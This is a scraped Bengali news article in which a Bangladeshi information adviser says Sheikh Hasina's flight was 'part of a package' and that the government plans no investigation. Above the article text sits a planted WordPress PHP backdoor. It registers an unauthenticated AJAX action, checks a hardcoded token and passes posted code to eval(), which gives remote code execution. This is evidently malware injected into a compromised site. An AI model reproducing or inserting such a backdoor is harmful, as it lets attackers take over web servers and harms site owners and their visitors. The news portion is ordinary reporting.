// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ‘হাসিনার দেশত্যাগ প্যাকেজের অংশ ছিল, সম্পৃক্তদের বিষয়ে তদন্তের কথা ভাবছে না সরকার’ | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeঅপরাধ‘হাসিনার দেশত্যাগ প্যাকেজের অংশ ছিল, সম্পৃক্তদের বিষয়ে তদন্তের কথা ভাবছে না সরকার’

‘হাসিনার দেশত্যাগ প্যাকেজের অংশ ছিল, সম্পৃক্তদের বিষয়ে তদন্তের কথা ভাবছে না সরকার’

শেখ হাসিনার দেশ ছাড়ার বিষয়টি একটি প্যাকেজের অংশ ছিল বলে মন্তব্য করেছেন প্রধানমন্ত্রীর তথ্য ও সম্প্রচার বিষয়ক উপদেষ্টা ডা. জাহেদ উর রহমান।

তবে, ক্ষমতাচ্যুত প্রধানমন্ত্রীর পলায়নের ঘটনার সঙ্গে সম্পৃক্তদের বিষয়ে তদন্তের কথা সরকার এ মুহূর্তে ভাবছে না বলেও জানিয়েছেন তিনি।

আজ মঙ্গলবার তথ্য অধিদপ্তরে আয়োজিত সাপ্তাহিক প্রেস ব্রিফিংয়ে এ কথা জানিয়েছেন তিনি।

জুলাই গণঅভ্যুত্থানে ক্ষমতাচ্যুত প্রধানমন্ত্রী শেখ হাসিনার পলায়নে সহযোগিতাকারীদের বিরুদ্ধে কোনো ব্যবস্থা এই সরকার নিবে কি না, এমন প্রশ্নের জবাবে প্রতিমন্ত্রী পদমর্যাদার এই উপদেষ্টা এসব কথা বলেছেন।

একইসঙ্গে আদালতের নিষেধাজ্ঞা অমান্য করে বাংলাদেশের গণমাধ্যম শেখ হাসিনার বক্তব্য প্রচার করলে সরকার প্রয়োজনীয় ব্যবস্থা নেবে বলেও জানিয়েছেন তিনি।

জাহেদ উর রহমান বলেন, ‘বিশ্বব্যাপী গণঅভ্যুত্থানের ইতিহাসে এ ধরনের (পলায়নের) ঘটনা ঘটেছে…এটা আমি এভাবে দেখতে চাই যে এটা একটা প্যাকেজের অংশ ছিল। আমরা তার (শেখ হাসিনার) কাছ থেকে মুক্ত হতে চেয়েছি। ওই মুক্ত হওয়ার সঙ্গে এই ব্যাপারগুলো সেভাবে ছিল।’

‘কারা কারা কোনভাবে যুক্ত ছিলেন, সে বিষয়ে এ মুহূর্তে কোনো তদন্তের চিন্তা সরকার করছে না। এ বিষয়গুলো ওই সময়কার যে পরিস্থিতি ছিল, সেই পরিস্থিতির প্রেক্ষাপটে দেখতে হবে,’ বলেন তিনি।

মার্কিন প্রেসিডেন্টের বিশেষ দূতের সফরের সময় ভারতীয় হাইকমিশনার এবং আওয়ামী লীগ নেতা সাবের হোসেনের সঙ্গে সাক্ষাৎসহ বিভিন্ন বিষয়ে সররকার চাপে আছে কি না, এমন প্রশ্নের জবাবে ডা. জাহেদ বলেন, ‘সরকার কোনো ভূ-রাজনৈতিক সমস্যায় নেই। জনগণের সমর্থন নিয়ে ক্ষমতায় আসা এই সরকার সবদিকে সবার সঙ্গে রাষ্ট্রীয় স্বার্থে সম্পর্ক তৈরি করছে।’

‘সরকার একদিকে আমেরিকার সঙ্গে চুক্তি নিয়ে কথা বলেছে, যেটি অন্তবর্তী সরকার করে গেছে। অন্যদিকে রাশিয়া, ইরান, চীন ও ভারতসহ সবার সঙ্গে কথা বলছে,’ যোগ করেন তিনি।

এ সময় উপদেষ্টা বলেন, ‘আগের সরকারের লক্ষ্য ছিল ক্ষমতায় থাকার জন্য কিছু কিছু দেশের সঙ্গে সম্পর্ক তৈরি করা। কিন্তু এই সরকার জনগণের বিশাল সমর্থন নিয়ে ক্ষমতায় এসেছে, তাই এই সরকার ভূ-রাজনৈতিক কোনো সমস্যায় নেই।’

‘মার্কিন দূত যিনি এসে ফিরে গেছেন, তিনি ভারতীয় হাইকমিশনারের সঙ্গে বৈঠক করেছেন…তিনি রাষ্ট্রদূতের পাশাপাশি অন্যান্য দায়িত্বও পালন করেন। এগুলোকে আসলে অন্যভাবে দেখার কিছু নেই। তিনি কার কার সঙ্গে ব্যক্তিগতভাবে দেখা করেছেন সেটা আমরা সরকারিভাবে ইনফর্ম নই, সে ব্যাপারে আমি মন্তব্য করছি না,’ বলেন তিনি।

শেখ হাসিনার ফিরে আসার বিষয়ে মন্তব্য জান্তএ চাইলে তিনি বলেন, ‘আমার মনে হয় না বাংলাদেশের রাজনীতিতে এই মুহূর্তে তাদের (কার্যক্রম নিষিদ্ধ আওয়ামী লীগের) কিছু করার সক্ষমতা আছে। এটা ঠিক যে তাদের সময়ের সুবিধাভোগী কিছু মানুষ প্রশাসনসহ বিভিন্ন পর্যায়ে আছে, তবে কিছু ভাড়াটে মানুষ দিয়ে কিছু করা সম্ভব নয়।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments